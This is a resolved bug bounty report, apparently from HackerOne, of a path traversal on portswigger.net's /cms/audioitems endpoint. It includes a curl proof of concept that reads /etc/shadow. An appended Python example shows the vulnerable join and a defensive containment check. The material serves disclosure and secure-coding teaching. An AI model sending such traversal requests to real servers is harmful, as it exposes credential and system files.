[portswigger.net] Path Traversal at /cms/audioitems
High
PortSwigger Web Security
Reported by
0xd0m7
Vulnerability Details
Technical details and impact analysis
Prelude.
I wasn't going to report it; I thought it was your laboratory, but after my first analysis this seems real.
**Description**
A path traversal as the root user was detected that allows remote attackers to see internal files as root.
`https://portswigger.net/cms/audioitems//etc/networks`
`https://portswigger.net/cms/audioitems//etc/shadow`
**PoC**
`curl -kis "https://portswigger.net/cms/audioitems//etc/shadow"`
{F3132191}
## Impact
Ability to read internal files as root.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Path Traversal
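
An added example, not part of the original report and not PortSwigger's code: the report does not say how the endpoint is implemented, so this assumes a Python handler that joins the URL remainder onto a media directory. It shows why a request shaped like `/cms/audioitems//etc/shadow` escapes a naive join, and a containment check that rejects both that form and the `../` form (a generalization beyond the report). `route_to_request`, `safe_resolve`, and the sample file are hypothetical names and constructed data.

```python
import os
import tempfile
from pathlib import Path

PREFIX = "/cms/audioitems/"  # route prefix taken from the report's URLs


def route_to_request(url_path: str) -> str:
    # Assumed routing step: everything after the prefix is the file name.
    if not url_path.startswith(PREFIX):
        raise ValueError("not an audioitems URL")
    return url_path[len(PREFIX):]


def naive_resolve(base: str, requested: str) -> str:
    # Vulnerable pattern: os.path.join() discards `base` when `requested`
    # is absolute, so "/etc/shadow" comes back unchanged.
    return os.path.join(base, requested)


def safe_resolve(base: str, requested: str) -> Path:
    """Return the real path of `requested` under `base`, or raise ValueError."""
    root = Path(base).resolve()
    # Reject absolute requests outright instead of trying to repair them.
    if os.path.isabs(requested) or requested.startswith(("/", "\\")):
        raise ValueError(f"absolute path rejected: {requested!r}")
    # resolve() collapses ".." and follows symlinks before the containment test.
    candidate = (root / requested).resolve()
    if root not in candidate.parents:
        raise ValueError(f"path escapes media root: {requested!r}")
    return candidate


def demo() -> dict:
    """Classify constructed sample URLs against a temporary media root."""
    results = {}
    with tempfile.TemporaryDirectory() as media_root:
        (Path(media_root) / "intro.mp3").write_bytes(b"constructed sample")
        for url in ("/cms/audioitems//etc/shadow",
                    "/cms/audioitems/../../etc/shadow",
                    "/cms/audioitems/intro.mp3"):
            try:
                path = safe_resolve(media_root, route_to_request(url))
                results[url] = "served" if path.is_file() else "not found"
            except ValueError:
                results[url] = "rejected"
    return results


if __name__ == "__main__":
    print(naive_resolve("/srv/media", "/etc/shadow"))  # naive join result
    for url, verdict in demo().items():
        print(f"{verdict:9} {url}")
```

The containment check limits which files can be named; running the serving process as an unprivileged user limits what can be read if a check is ever bypassed.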